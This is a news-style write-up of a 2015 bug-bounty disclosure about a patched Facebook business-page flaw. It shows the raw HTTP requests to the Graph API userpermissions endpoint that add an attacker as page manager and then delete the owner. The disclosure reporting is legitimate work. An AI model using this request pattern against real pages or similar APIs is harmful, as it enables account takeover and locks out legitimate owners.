Facebook vulnerability allows hackers to take admin control of the business pages on Facebook

Security researcher Laxman Muthiya has found a serious vulnerability in the way Facebook business manager allows third party access. This vulnerability can be exploited by hackers to gain limited permissions and the victim will permanently lose admin access to the page.

Detailing his findings on his blog, Laxman has stated that if the vulnerability is exploited, the hacker can take over admin privileges of a Facebook page and remove the victim.

 

By default Facebook application interface do not allow third party applications to add or modify page admin roles (page roles like manager, editor, analyst etc..). Third party applications are allowed to perform all the operations like post statuses on your behalf, publish photos, etc.. except adding admin roles because if an application is allowed to add or remove admins then it could add some user as admin to the page and remove the actual owner permanently.

However business pages on Facebook operate on different theory. There is an endpoint for business pages called userpermissions which allows to add or remove page admin roles who are already handling the Facebook business. Muthiya found out that there is a vulnerability in this endpoint which can be exploited to take over the business page of the victim and remove him/her from admin control.

Laxman found that he could make a manage_pages request to to this endpoint tool using following request



 POST /PGID/userpermissions HTTP/1.1
 Host: graph.facebook.com 
 Content-Length: 245
 role=MANAGER&user=X&business=B&access_token=AAAA...

Page Takeover :

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
role=MANAGER&user=<target_user_id>&access_token=<application_access_token>
 
Response :-
true

Removing Victim

Request :-
Delete /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
user=<target_user_id>&access_token=<application_access_token>
 
Response :-
true
Thats all! Target page is hacked!

Muthiya contacted the Facebook security team about the vulnerability. Facebook confirmed the vulnerability and awarded him a bug bounty of $2500.00. The vulnerability has been patched by Facebook.

Proof of concept video :

Hacking Facebook PagesAnother Serious Vulnerability in FacebookVulnerability : Hacking Facebook PagesStatus : FixedReward $2500 USDProof Of Concept : https://www.7xter.com/2015/08/hacking-facebook-pages.html

Posted by 7xter on Wednesday, August 26, 2015